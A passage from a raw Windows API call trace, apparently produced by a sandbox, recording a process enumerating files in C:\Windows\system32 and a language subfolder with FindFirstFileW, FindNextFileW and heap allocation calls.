lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08b31c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xb08b31c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808b0720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x51a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="authfwcfg.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="authfwcfg.dll") returned 13 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9c) returned 0x70a180 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a14413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x9a14413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808fe920, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x48a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWGP.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="AuthFWGP.dll") returned 12 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a228 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aed7d9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9aed7d9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9af4a1bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4d5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapin.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="AuthFWSnapin.dll") returned 16 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa2) returned 0x70bef0 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eeeaef, ftCreationTime.dwHighDateTime=0x1ca0406, ftLastAccessTime.dwLowDateTime=0xcd1a5500, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0x3931bcc5, ftLastWriteTime.dwHighDateTime=0x1ca0421, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="AuthFWWizFwk.dll") returned 16 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa2) returned 0x70bfa0 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acdeb81, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8acdeb81, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad04ce2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1b5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="authui.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="authui.dll") returned 10 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x707ce0 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x714738cc, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x714738cc, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80ac71d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="authz.dll", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="authz.dll") returned 9 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x94) returned 0x707d80 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d92e0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85d92e0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85f5be93, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0030.661] lstrlenW (lpString="autochk.exe") returned 11 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x707e20 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332c5e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8332c5e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83352741, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="autoconv.exe") returned 12 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a2d0 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cae5ce, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85cae5ce, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85cd472e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa0e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="autofmt.exe") returned 11 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x707ec0 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9bee9c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoplay.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="autoplay.dll") returned 12 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a378 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc3f99b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xfdc3f99b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x80b12cc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayApi.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="AuxiliaryDisplayApi.dll") returned 23 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x70c050 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a8ae8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb67a8ae8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb67cec49, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuxiliaryDisplayCpl.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="AuxiliaryDisplayCpl.dll") returned 23 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x70c108 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8898fb50, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8898fb50, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80c1ce90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="avicap32.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="avicap32.dll") returned 12 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a420 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b15f501, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b15f501, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b185661, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="avifil32.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="avifil32.dll") returned 12 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a4c8 [0030.662] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb761c16, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xb761c16, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x80d75260, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="avrt.dll", cAlternateFileName="")) returned 1 [0030.662] lstrlenW (lpString="avrt.dll") returned 8 [0030.662] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x92) returned 0x707f60 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1533a9b1, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x1533a9b1, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x5df3f69c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0xa273, dwReserved0=0x0, dwReserved1=0x0, cFileName="azman.msc", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="azman.msc") returned 9 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849c970b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849c970b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849ef86b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xba400, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroles.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="azroles.dll") returned 11 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x708000 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba1c5fa, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ba1c5fa, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ba4275a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroleui.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="azroleui.dll") returned 12 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a570 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849a35ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x849a35ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x849c970b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzSqlExt.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="AzSqlExt.dll") returned 12 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a618 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afe273e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9afe273e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9afe273e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23580, dwReserved0=0x0, dwReserved1=0x0, cFileName="basecsp.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="basecsp.dll") returned 11 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7080a0 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b8ef69, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86b8ef69, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86bb50c9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="batmeter.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="batmeter.dll") returned 12 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a6c0 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b43e34, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x40b43e34, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xff749c50, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x13c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcrypt.dll", cAlternateFileName="")) returned 1 [0030.663] lstrlenW (lpString="bcrypt.dll") returned 10 [0030.663] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x708140 [0030.663] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f17635, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x46f17635, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xea1f1abe, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3cf50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcryptprimitives.dll", cAlternateFileName="")) returned 1 [0030.664] lstrlenW (lpString="bcryptprimitives.dll") returned 20 [0030.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaa) returned 0x70c1c0 [0030.664] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6d4c3e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xfa6d4c3e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x6459c5f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdaplgin.ax", cAlternateFileName="")) returned 1 [0030.664] lstrlenW (lpString="bdaplgin.ax") returned 11 [0030.664] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0030.664] lstrlenW (lpString="bg-BG") returned 5 [0030.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70c278 [0030.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\bg-BG\\*", lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x24d65dc, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x24d65dc, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a0e36a, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc9d07ed6, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc9d07ed6, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafeccf7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcb56dfb2, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcb56dfb2, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4221919, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc45ffcbf, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc45ffcbf, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="fms.dll.mui") returned 11 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca478364, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca8305ab, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca8305ab, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="mlang.dll.mui") returned 13 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0030.665] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c278 | out: lpFindFileData=0x70c278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a11ca1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc7fdf21a, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc7fdf21a, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x16000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 0 [0030.665] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.665] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c278 | out: hHeap=0x6d0000) returned 1 [0030.665] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x943ab875, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x943ab875, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x81bbbef0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="bidispl.dll", cAlternateFileName="")) returned 1 [0030.665] lstrlenW (lpString="bidispl.dll") returned 11 [0030.665] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7081e0 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b6860f, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd6b6860f, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x81ced1c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x29e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BioCredProv.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="BioCredProv.dll") returned 15 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x70a768 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5d9a8a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8e5d9a8a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8e5d9a8a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsadmin.exe", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsadmin.exe") returned 13 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9c) returned 0x70a810 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a972bdb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a972bdb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a972bdb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsperf.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsperf.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a8b8 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc757d6b0, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc757d6b0, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d5fdb0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx2.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsprx2.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a960 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74befd5, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc74befd5, ftLastAccessTime.dwHighDateTime=0x1ca0411, 